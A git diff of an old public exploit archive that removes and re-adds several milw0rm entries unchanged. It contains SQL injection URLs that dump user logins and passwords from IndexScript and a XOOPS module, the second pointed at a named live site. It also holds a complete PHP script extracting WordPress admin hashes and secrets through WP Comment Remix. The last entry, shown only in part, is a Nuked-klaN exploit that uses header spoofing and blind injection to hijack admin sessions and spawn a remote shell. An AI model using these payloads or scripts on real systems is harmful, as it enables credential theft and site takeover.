-[~] Pentest| Gibon| Pig       AND      milw0rm staff
-[~]-------------------------------------------------------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
-[~]
-[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
-[~]
-[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
-[~]
-[~] Example :-
-[~]
-[~] http://spaceho.com/sug_cat.php?parent_id=SQL
-[~]-------------------------------------------------------------------------------------------------------------
-[~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat]
-[~]-------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-10-13]
+[~]-------------------------------------------------------------------------------------------------------------
+[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability
+[~]
+[~] http://www.indexscript.com/download.php
+[~]    
+[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.]
+[~] ------------------------------------------------------------------------------------------------------------
+[~] Bug founded by d3v1l   [Avram Marius]
+[~]
+[~] Date: 12.10.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com    http://security-sh3ll.com
+[~]
+[~] ------------------------------------------------------------------------------------------------------------
+[~] Greetz tO ALL:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] Pentest| Gibon| Pig       AND      milw0rm staff
+[~]-------------------------------------------------------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
+[~]
+[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
+[~]
+[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
+[~]
+[~] Example :-
+[~]
+[~] http://spaceho.com/sug_cat.php?parent_id=SQL
+[~]-------------------------------------------------------------------------------------------------------------
+[~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat]
+[~]-------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-10-13]
diff --git a/platforms/php/webapps/6747.php b/platforms/php/webapps/6747.php
index 16750e08a..ccece805b 100755
--- a/platforms/php/webapps/6747.php
+++ b/platforms/php/webapps/6747.php
@@ -1,231 +1,231 @@
-
-	 *
-	 * Advisory:
-	 * http://chxsecurity.org/advisories/adv-3-full.txt
-	 *
-	 * PoC Mirror:
-	 * http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip
-	 *
-	 * Attention:
-	 * This is a Proof-of-Concept it was never intended to be fully functional
-	 *
-	 * Notes:
-	 * Uses cURL
-	 */
-
-	// Script Header
-	function head() {
-		print "\n WP Comment Remix 1.4.3 SQL Injection";
-		print "\n By g30rg3_x ";
-		print "\n ------------------------------------------------";
-		print "\n This is a Proof-of-Concept it was never intended to be fully functional\n";
-	}
-
-	// Usage Information
-	function usage() {
-		global $argv;
-		head();
-		print "\n Usage: php {$argv[0]}    \n";
-		print "\n  : Hostname or IP Address";
-		print "\n  : Path to WordPress (Defaults to: /)";
-		print "\n  : Information to Extract (Defaults to: relevant)";
-		print "\n    dbinfo = Extract MySQL Current User, Database and Version";
-		print "\n    admins = Extract Only Admins (users with level 10)";
-		print "\n    users = Extract All Users (includes admins)";
-		print "\n    options = Extract Relevant Options like active_plugins, secret, ...";
-		print "\n    alloptions = Extrac All Options (Huge data would be directly printed out!)";
-		print "\n    relevant = dbinfo + admins + options";
-		print "\n    all = dbinfo + users + alloptions";
-		print "\n  : WordPress Tables Prefix (Defaults to: wp_)\n";
-		print "\n Examples:";
-		print "\n  php {$argv[0]} foo.bar";
-		print "\n  php {$argv[0]} foo.bar /wordpress/";
-		print "\n  php {$argv[0]} foo.bar /wordpress/ all foo_";
-		print "\n";
-		exit();
-	}
-
-	// cURL HTTP GET
-	function GET($url) {
-		$ch = curl_init($url);
-		curl_setopt($ch, CURLOPT_HEADER, true);
-		curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close'));
-		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-		curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept');
-		$result = curl_exec($ch);
-		curl_close($ch);
-
-		if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) )
-			return $result;
-		else
-			return false;
-	}
-
-	// Obtain Database Information
-	function obtainDBInfo() {
-		global $prefix, $url;
-		$injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--';
-		$result = GET($url . $injection);
-		preg_match_all('/user\{(?P.+)\}DB\{(?P.+)\}version\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
-		$db['user'] = $captured['user'][0];
-		$db['name'] = $captured['DB'][0];
-		$db['version'] = $captured['version'][0];
-		return $db;
-	}
-
-	// Obtain WordPress Users Information
-	function obtainUsersInfo($all = false) {
-		global $prefix, $url;
-		$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--';
-		$result = GET($url . $injection);
-		preg_match_all('/user\{(?P.+)\}pass\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
-		for( $i = 0; $i < count($captured['user']); $i++ )
-			$users[$captured['user'][$i]] = $captured['pass'][$i];
-		return $users;
-	}
-
-	// Obtain WordPress Options Information
-	function obtainOptionsInfo($all = false) {
-		global $prefix, $url;
-		$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--';
-		$result = GET($url . $injection);
-		preg_match_all('%
    (?P.+)\{\|(?P.+)\|\}
    %', $result, $captured, PREG_PATTERN_ORDER);
-		for( $i = 0; $i < count($captured['name']); $i++ )
-			$options[$captured['name'][$i]] = $captured['value'][$i];
-		return $options;
-	}
-
-	// Set no time limit (only if safe mode is off)
-	if ( !ini_get('safe_mode') )
-		set_time_limit(0);
-
-	// Print usage if there is no host
-	if ( !isset($argv[1]) )
-		usage();
-
-	// Header, Arguments and Generate URL
-	head();
-	$host = $argv[1];
-	$path = isset($argv[2]) ? $argv[2] : '/';
-	$info = isset($argv[3]) ? $argv[3] : 'relevant';
-	$prefix = isset($argv[4]) ? $argv[4] : 'wp_';
-	$url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0';
-
-	// Check if we can reach "ajax_comments.php"
-	print "\n Does ajax_comments.php exist? ... ";
-	$result = GET($url);
-	if ( !$result ) {
-		print "No";
-		print "\n -----------------------------------------------------------";
-		print "\n Seems that the site does not have WP Comment Remix installed";
-		print "\n OR the path you proportionate is incorrect.";
-		print "\n Please review your arguments and try again.\n";
-		exit();
-	}
-	print 'Yes';
-
-	// Check if is it possible to inject...
-	// ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter
-	// the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default
-	// enviroment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve
-	// this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept.
-	print "\n Can we Inject SQL Code? ... ";
-	$result = GET($url . '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--');
-	if ( preg_match('/There are no comments for this post/', $result) ) {
-		print "No";
-		print "\n --------------------------------------";
-		print "\n Seems that the host is already patched.\n";
-		exit();
-	}
-	print 'Yes';
-
-	// Check table prefix but don't check if the user selected to obtain database information.
-	if ( $info != 'dbinfo') {
-		print "\n Is \"{$prefix}\" the table prefix? ... ";
-		$result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--");
-		if ( preg_match('/There are no comments for this post/', $result) ) {
-			print "No";
-			print "\n ------------------------------------------------";
-			print "\n Seems that the table prefix \"{$prefix}\" is incorrect.";
-			print "\n But this time we are not exiting, cause we can still extract";
-			print "\n the database information, so m just going to change your choice";
-			print "\n to dbinfo so you can still get that valuable information.";
-			print "\n ------------------------------------------------\n";
-			$info = 'dbinfo';
-		} else {
-			print 'Yes';
-		}
-	}
-
-	// Now is time to inject
-	print "\n\n Seems that everything is fine so now it's super fun time :P...";
-	switch($info) {
-		case 'all':
-			$db = obtainDBInfo();
-			$users = obtainUsersInfo(true);
-			$options = obtainOptionsInfo(true);
-			break;
-		case 'relevant':
-			$db = obtainDBInfo();
-			$users = obtainUsersInfo();
-			$options = obtainOptionsInfo();
-			break;
-		case 'dbinfo':
-			$db = obtainDBInfo();
-			break;
-		case 'admins':
-			$users = obtainUsersInfo();
-			break;
-		case 'users':
-			$users = obtainUsersInfo(true);
-			break;
-		case 'options':
-			$options = obtainOptionsInfo();
-			break;
-		case 'alloptions':
-			$options = obtainOptionsInfo(true);
-			break;
-	}
-
-	/* It's Show Time */
-
-	// Database Information
-	if ( !empty($db) ) {
-		print "\n\n Database Information";
-		print "\n ---------------------";
-		print "\n MySQL User: {$db['user']}";
-		print "\n MySQL Version: {$db['version']}";
-		print "\n MySQL Database Name: {$db['name']}";
-	}
-
-	// Users Information
-	if ( !empty($users) ) {
-		print "\n\n Users";
-		print "\n ---------";
-		foreach( (array) $users as $user => $pass ) {
-			print "\n Username: {$user}";
-			print "\n Password: {$pass}  " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' );
-			print "\n ---------";
-		}
-	}
-
-	// Options Information
-	if ( !empty($options) ) {
-		print "\n\n Options";
-		print "\n ---------";
-		foreach( (array) $options as $name => $value ) {
-			print "\n Name: {$name}";
-			print "\n Value: {$value}";
-			print "\n ---------";
-		}
-	}
-
-	// Good Bye =)
-	print "\n\n Have Fun! =)\n";
-?>
-
-# milw0rm.com [2008-10-14]
+
+	 *
+	 * Advisory:
+	 * http://chxsecurity.org/advisories/adv-3-full.txt
+	 *
+	 * PoC Mirror:
+	 * http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip
+	 *
+	 * Attention:
+	 * This is a Proof-of-Concept it was never intended to be fully functional
+	 *
+	 * Notes:
+	 * Uses cURL
+	 */
+
+	// Script Header
+	function head() {
+		print "\n WP Comment Remix 1.4.3 SQL Injection";
+		print "\n By g30rg3_x ";
+		print "\n ------------------------------------------------";
+		print "\n This is a Proof-of-Concept it was never intended to be fully functional\n";
+	}
+
+	// Usage Information
+	function usage() {
+		global $argv;
+		head();
+		print "\n Usage: php {$argv[0]}    \n";
+		print "\n  : Hostname or IP Address";
+		print "\n  : Path to WordPress (Defaults to: /)";
+		print "\n  : Information to Extract (Defaults to: relevant)";
+		print "\n    dbinfo = Extract MySQL Current User, Database and Version";
+		print "\n    admins = Extract Only Admins (users with level 10)";
+		print "\n    users = Extract All Users (includes admins)";
+		print "\n    options = Extract Relevant Options like active_plugins, secret, ...";
+		print "\n    alloptions = Extrac All Options (Huge data would be directly printed out!)";
+		print "\n    relevant = dbinfo + admins + options";
+		print "\n    all = dbinfo + users + alloptions";
+		print "\n  : WordPress Tables Prefix (Defaults to: wp_)\n";
+		print "\n Examples:";
+		print "\n  php {$argv[0]} foo.bar";
+		print "\n  php {$argv[0]} foo.bar /wordpress/";
+		print "\n  php {$argv[0]} foo.bar /wordpress/ all foo_";
+		print "\n";
+		exit();
+	}
+
+	// cURL HTTP GET
+	function GET($url) {
+		$ch = curl_init($url);
+		curl_setopt($ch, CURLOPT_HEADER, true);
+		curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close'));
+		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+		curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept');
+		$result = curl_exec($ch);
+		curl_close($ch);
+
+		if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) )
+			return $result;
+		else
+			return false;
+	}
+
+	// Obtain Database Information
+	function obtainDBInfo() {
+		global $prefix, $url;
+		$injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--';
+		$result = GET($url . $injection);
+		preg_match_all('/user\{(?P.+)\}DB\{(?P.+)\}version\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
+		$db['user'] = $captured['user'][0];
+		$db['name'] = $captured['DB'][0];
+		$db['version'] = $captured['version'][0];
+		return $db;
+	}
+
+	// Obtain WordPress Users Information
+	function obtainUsersInfo($all = false) {
+		global $prefix, $url;
+		$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--';
+		$result = GET($url . $injection);
+		preg_match_all('/user\{(?P.+)\}pass\{(?P.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
+		for( $i = 0; $i < count($captured['user']); $i++ )
+			$users[$captured['user'][$i]] = $captured['pass'][$i];
+		return $users;
+	}
+
+	// Obtain WordPress Options Information
+	function obtainOptionsInfo($all = false) {
+		global $prefix, $url;
+		$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--';
+		$result = GET($url . $injection);
+		preg_match_all('%
    (?P.+)\{\|(?P.+)\|\}
    %', $result, $captured, PREG_PATTERN_ORDER);
+		for( $i = 0; $i < count($captured['name']); $i++ )
+			$options[$captured['name'][$i]] = $captured['value'][$i];
+		return $options;
+	}
+
+	// Set no time limit (only if safe mode is off)
+	if ( !ini_get('safe_mode') )
+		set_time_limit(0);
+
+	// Print usage if there is no host
+	if ( !isset($argv[1]) )
+		usage();
+
+	// Header, Arguments and Generate URL
+	head();
+	$host = $argv[1];
+	$path = isset($argv[2]) ? $argv[2] : '/';
+	$info = isset($argv[3]) ? $argv[3] : 'relevant';
+	$prefix = isset($argv[4]) ? $argv[4] : 'wp_';
+	$url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0';
+
+	// Check if we can reach "ajax_comments.php"
+	print "\n Does ajax_comments.php exist? ... ";
+	$result = GET($url);
+	if ( !$result ) {
+		print "No";
+		print "\n -----------------------------------------------------------";
+		print "\n Seems that the site does not have WP Comment Remix installed";
+		print "\n OR the path you proportionate is incorrect.";
+		print "\n Please review your arguments and try again.\n";
+		exit();
+	}
+	print 'Yes';
+
+	// Check if is it possible to inject...
+	// ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter
+	// the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default
+	// enviroment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve
+	// this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept.
+	print "\n Can we Inject SQL Code? ... ";
+	$result = GET($url . '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--');
+	if ( preg_match('/There are no comments for this post/', $result) ) {
+		print "No";
+		print "\n --------------------------------------";
+		print "\n Seems that the host is already patched.\n";
+		exit();
+	}
+	print 'Yes';
+
+	// Check table prefix but don't check if the user selected to obtain database information.
+	if ( $info != 'dbinfo') {
+		print "\n Is \"{$prefix}\" the table prefix? ... ";
+		$result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--");
+		if ( preg_match('/There are no comments for this post/', $result) ) {
+			print "No";
+			print "\n ------------------------------------------------";
+			print "\n Seems that the table prefix \"{$prefix}\" is incorrect.";
+			print "\n But this time we are not exiting, cause we can still extract";
+			print "\n the database information, so m just going to change your choice";
+			print "\n to dbinfo so you can still get that valuable information.";
+			print "\n ------------------------------------------------\n";
+			$info = 'dbinfo';
+		} else {
+			print 'Yes';
+		}
+	}
+
+	// Now is time to inject
+	print "\n\n Seems that everything is fine so now it's super fun time :P...";
+	switch($info) {
+		case 'all':
+			$db = obtainDBInfo();
+			$users = obtainUsersInfo(true);
+			$options = obtainOptionsInfo(true);
+			break;
+		case 'relevant':
+			$db = obtainDBInfo();
+			$users = obtainUsersInfo();
+			$options = obtainOptionsInfo();
+			break;
+		case 'dbinfo':
+			$db = obtainDBInfo();
+			break;
+		case 'admins':
+			$users = obtainUsersInfo();
+			break;
+		case 'users':
+			$users = obtainUsersInfo(true);
+			break;
+		case 'options':
+			$options = obtainOptionsInfo();
+			break;
+		case 'alloptions':
+			$options = obtainOptionsInfo(true);
+			break;
+	}
+
+	/* It's Show Time */
+
+	// Database Information
+	if ( !empty($db) ) {
+		print "\n\n Database Information";
+		print "\n ---------------------";
+		print "\n MySQL User: {$db['user']}";
+		print "\n MySQL Version: {$db['version']}";
+		print "\n MySQL Database Name: {$db['name']}";
+	}
+
+	// Users Information
+	if ( !empty($users) ) {
+		print "\n\n Users";
+		print "\n ---------";
+		foreach( (array) $users as $user => $pass ) {
+			print "\n Username: {$user}";
+			print "\n Password: {$pass}  " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' );
+			print "\n ---------";
+		}
+	}
+
+	// Options Information
+	if ( !empty($options) ) {
+		print "\n\n Options";
+		print "\n ---------";
+		foreach( (array) $options as $name => $value ) {
+			print "\n Name: {$name}";
+			print "\n Value: {$value}";
+			print "\n ---------";
+		}
+	}
+
+	// Good Bye =)
+	print "\n\n Have Fun! =)\n";
+?>
+
+# milw0rm.com [2008-10-14]
diff --git a/platforms/php/webapps/6748.txt b/platforms/php/webapps/6748.txt
index 0e6ca8f11..3f7952323 100755
--- a/platforms/php/webapps/6748.txt
+++ b/platforms/php/webapps/6748.txt
@@ -1,27 +1,27 @@
-##########################################
-#
-# XOOPS Module:  xhresim All Version
-#
-#
-##########################################
-#
-##AUTHOR : EcHoLL
-####HOME : http://www.warezturk.org
-#
-####MAÄ°L : echoll1983@hotmail.com
-#
-###########################################
-#
-# DORKS 1 : dork: /modules/xhresim/#
-###########################################
-
- 
- 
- 
-target: http://scriptpage.com/modules/xhresim/index.php?no=[ Sql Code]
- 
-sql code= 9999+union+select+0,concat(uname,0x3a,pass),2,3+from+xoops_users--
- 
-live link : http://www.sakakusu.net/saka/modules/xhresim/index.php?no=75+union+select+0,convert(database()%20using%20latin1),2,convert(user()%20using%20latin1)--
-
-# milw0rm.com [2008-10-14]
+##########################################
+#
+# XOOPS Module:  xhresim All Version
+#
+#
+##########################################
+#
+##AUTHOR : EcHoLL
+####HOME : http://www.warezturk.org
+#
+####MAÄ°L : echoll1983@hotmail.com
+#
+###########################################
+#
+# DORKS 1 : dork: /modules/xhresim/#
+###########################################
+
+ 
+ 
+ 
+target: http://scriptpage.com/modules/xhresim/index.php?no=[ Sql Code]
+ 
+sql code= 9999+union+select+0,concat(uname,0x3a,pass),2,3+from+xoops_users--
+ 
+live link : http://www.sakakusu.net/saka/modules/xhresim/index.php?no=75+union+select+0,convert(database()%20using%20latin1),2,convert(user()%20using%20latin1)--
+
+# milw0rm.com [2008-10-14]
diff --git a/platforms/php/webapps/6749.php b/platforms/php/webapps/6749.php
index 6fff34788..c0ef23696 100755
--- a/platforms/php/webapps/6749.php
+++ b/platforms/php/webapps/6749.php
@@ -1,1701 +1,1701 @@
-
-# URL:     http://real.o-n.fr/
-# Date:    14/10/2008
-#
-# Special thanks to Louis for remembering me I had to finish it =)
-#
-# VULNERABILITY DETAILS
-# ---------------------
-#
-# Nuked-klaN suffers from a vulnerability due to HTTP_REFERER, which is not
-# correctly  filtered  before being inserted in  nuked_stats_visitor table.
-#
-# If HTTP headers are not addslashes()'d by PHP,  it could lead to a INSERT
-# SQL injection.
-#
-# In function view_referer() (visits.php),  referers are extracted from the 
-# database to perform an other SQL query, without being secured in between.
-# This leads to a blind SQL injection.
-#
-# Theses injections are  only possible if Nuked-klaN (NK) considers us as a
-# new user, because else it won't touch the nuked_stats_visitor table.
-# For this,  we can use X-Forwarded-For HTTP header to specify NK a new IP,
-# to be considered as a new user, and therefore access the database.
-# NK automaticaly tries to resolve our host (using gethostbyaddr()), and it
-# could be very long if the IP is not corresponding to a real one,  because
-# the default timeout is ~3 seconds, and that's very unconvenient for blind
-# SQL injection.
-# In order to solve this,  we can try to  generate IPs that might be valid,
-# using, for example, a known BASE (the first two numbers), and randomizing
-# the two other numbers.
-#
-# Stats can be disabled, or not accessible for users or visitors.
-# In the last case we can't get query results,  so the unique way to inject
-# is BENCHMARK method, but this implies that the headers are not addslashed
-# by PHP, but this method is not implemented in this exploit.
-#
-# If we got an admin session or login, we can spawn a remote shell/uploader
-# using the NK "MySQL administration",  but PHP safe_mode must be disabled.
-#
-# This exploit uses  all these vulnerabilities to spawn a shell/uploader or
-# to simply obtain admin credentials.
-#
-# EXPLOIT MAP
-# -----------
-#
-# (ERRORS ARE THIS WAY ->)
-# 
-# +---------------------------+
-# | Check stats accessibility |->exit()
-# +---------------------------+
-#   |
-#   |  +---------------------------------+  +-----------------------------------------------+
-#   +->| Spoof referer to corrupt INSERT |->| Spoof referer to corrupt view_referer() query |->exit()
-#      | query and look for results      |  | (blind sql injection)                         |
-#      +---------------------------------+  +-----------------------------------------------+
-#        |                                    |
-#        |  +--------------------------+      | +---------------------------------------------+
-#        +->| Did we find an admin SID |<-----+ | We only have a login and a hashed password, |
-#           | or not ?                 |------->| we have to crack it and use -admin          |
-#           +--------------------------+        +---------------------------------------------+
-#             |
-#             |  +-------------------------------------------------+
-#             +->| Login as admin and spawn an uploader or a shell |
-#                | using "MySQL administration"                    |
-#                +-------------------------------------------------+
-#
-# SOLUTION
-# --------
-# The best way to secure your Nuked-klaN is disabling stats using the admin
-# panel.
-# If you wan't to keep stats activated, you have to addslashes HTTP_REFERER
-# in nuked.php and in visits.php.
-#
-#
-# THIS IS FOR EDUCATION PURPOSES ONLY, as usual.
-#
-
-error_reporting(E_ALL ^ E_NOTICE);
-
-define('MSG_INFO', 1);
-define('MSG_OKAY', 2);
-define('MSG_ERROR', 3);
-define('MSG_QUESTION', 4);
-
-define('AGENT', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16');
-define('IPBASE', '82.237.');
-
-define('UPCODE', '\')) exit(\'--NOTDONE--\');fclose($h);exit(\'--DONE--\');}else{include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>');
-define('SHCODE', '');
-
-$nk = new nk();
-
-class nk
-{
-	var $proxy;
-	
-	var $user;
-	var $admin;
-	var $suser;
-	var $sadmin;
-	var $mode;
-	var $url;
-	var $year;
-	
-	var $ips = array();
-	var $queries;
-	var $www;
-	
-	function nk()
-	{
-		$this->header();
-		$this->usage();
-		
-		$this->setParameters();
-		$this->controlParameters();
-		
-		$this->main();
-	}
-	
-	function close()
-	{
-		$this->msg();
-		exit(0);
-	}
-	
-	# Main function, what and when.
-	function main()
-	{
-		# Admin login not specified
-		if(!$this->sadmin)
-		{
-			$this->setQueries(0);
-			$this->checkStatsAccessibility();
-			$this->sendInsertQuery();
-		
-			# Got the credentials =)
-			if($this->getCredentials())
-			{
-				$this->dumpCredentials();
-			}
-			elseif($this->blindQueries())
-			{
-				if($this->mode != 2 && !$this->admin['sid'])
-				{
-					$this->msg('There is no active admin session, try with "-mode 2"', MSG_ERROR);
-					exit();
-				}
-				
-				$this->file = str_replace('$_SERVER[\'HTTP_SHELL\']', 'stripslashes($_SERVER[\'HTTP_SHELL\'])', $this->file);
-			}
-			# No attack worked
-			else
-			{
-				$this->msg('Exploit failed, stats might be disabled.', MSG_ERROR);
-				exit();
-			}
-		}
-		
-		$this->makeadmin();
-		$this->conclude();
-	}
-	
-	# Define queries in function of the current mode
-	function setQueries($mode)
-	{
-		$this->queries   = array();
-		
-		if(!$mode)
-		{
-			# User queries
-			$this->queries['name']     = 'SELECT pseudo FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1';
-			$this->queries['password'] = 'SELECT pass FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1';
-			
-			# Session queries
-			if($this->mode != 2)
-			{
-				$this->queries['uid'] = 'SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1';
-				$this->queries['sid'] = 'SELECT id FROM sessions WHERE user_id=(SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1) ORDER BY DATE DESC LIMIT 1';
-			}
-		}
-		else
-		{
-			list($day, $month, $year) = explode(':', date('d:m:Y'));
-			$this->queries[] = 'ALTER TABLE block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;';
-			$this->queries[] = 'UPDATE block SET type=0x2f2e2e2f2e2e2f2e2e2f00 WHERE type=0x6c6f67696e OR type LIKE 0x252f2e2e25 AND active!=0 LIMIT 1;';
-			$this->queries[] = 'DELETE FROM stats_visitor WHERE (day=' . $day . ' AND month=' . $month . ' AND year=' . $year . ') OR year=' . $this->year . ' OR year=0;';
-		}
-		
-		# Set the SQL prefix
-		foreach($this->queries as $k => $v)
-			$this->queries[$k] = str_replace('', $this->sprefix, $v);
-	}
-	
-	# Informs of the stats accessibility
-	function checkStatsAccessibility()
-	{
-		$this->msg('Checking statistics accessibility ...', MSG_INFO, false);
-		
-		$accessibility = $this->areStatsReachable();
-		
-		if($accessibility == 1)
-		{
-			$this->msg('Statistics are reachable, but require authentification', MSG_OKAY);
-			
-			if(!$this->suser)
-			{
-				$this->msg('Please create an user and specify it using -user parameter', MSG_ERROR);
-				exit();
-			}
-			else
-			{
-				$this->makeuser();
-			}
-		}
-		elseif($accessibility == 0)
-		{
-			$this->msg('Statistics are reachable as a visitor', MSG_OKAY);
-		}
-		else
-		{
-			$this->msg('Statistics are NOT reachable or activated', MSG_ERROR);
-			exit();
-		}
-	}
-		
-	# Determine if stats are accessible, and under which conditions
-	function areStatsReachable()
-	{
-		$this->wwwinit(0);
-		$this->www->addheader('Referer', 'http://test.com/');
-		$this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer');
-		
-		if(preg_match('#[^<]+#i', $this->www->getcontent()))
-			return -1;
-		if(preg_match('#[^<]+#i', $this->www->getcontent()))
-			return 1;
-			
-		if(!preg_match('#http://test\.com/#i', $this->www->getcontent()))
-			return -1;
-		
-		return 0;
-	}
-	
-	# Send the spoofed referer in order to insert interresting
-	# informations in the nuked_stats_visitors table
-	function sendInsertQuery()
-	{
-		$time = time()+60;
-		
-		$this->msg('Sending INSERT query ...', MSG_INFO, false);
-		
-		# End the first row
-		$sql  = "http://google.com/', '', '', '', '', '0'), ";
-		
-		# For each query, a new row
-		foreach($this->queries as $key => $query)
-		{
-			$sql .= "('', '', '0.0.0.0', 'attack', 'Mozilla', 'Windows', CONCAT(''), '1', '1', '" .$this->year . "', '1', '$time'), ";
-		}
-		
-		# End this with the beginning of a row, to have a valid SQL query
-		$sql .= "('', '', '', '', '', '', '";
-		
-		# Let's send it
-		$this->wwwinit(0);
-		$this->www->addheader('Referer', $sql);
-		$this->www->get($this->url);
-		
-		$this->msg('Sent INSERT query       ', MSG_OKAY);
-	}
-	
-	# Get insert query result in stats page, credentials
-	function getCredentials()
-	{
-		$this->admin = array();
-		
-		$this->msg('Retrieving credentials ...', MSG_INFO, false);
-		
-		$this->wwwinit(1);
-		$this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=' . $this->year);
-		
-		if(!preg_match_all('##Ui', $this->www->getcontent(), $data))
-		{
-			$this->msg('Unable to reach credentials', MSG_ERROR);
-			return false;
-		}
-		
-		for($i=0;$iadmin[$data[1][$i]] = $data[2][$i];
-		}
-			
-		$this->msg('Got the credentials =)    ', MSG_OKAY);
-		
-		return true;
-	}
-	
-	# Dump $this->user content
-	function dumpCredentials()
-	{
-		$display = array
-		(
-			'User      : ' => 'name',
-			'Password  : ' => 'password',
-			'UserID    : ' => 'uid',
-			'SessionID : ' => 'sid',
-		);
-		
-		foreach($display as $key => $value)
-			if($this->admin[$value])
-				$this->msg($key . $this->admin[$value], MSG_OKAY);
-	}
-	
-	# Here we are on the second attack: we have to blind, but only
-	# critical information because it's pretty long
-	function blindQueries()
-	{
-		$this->msg('Switching to blind mode, be (very) patient ...', MSG_INFO);
-		
-		if($this->mode != 2)
-		{
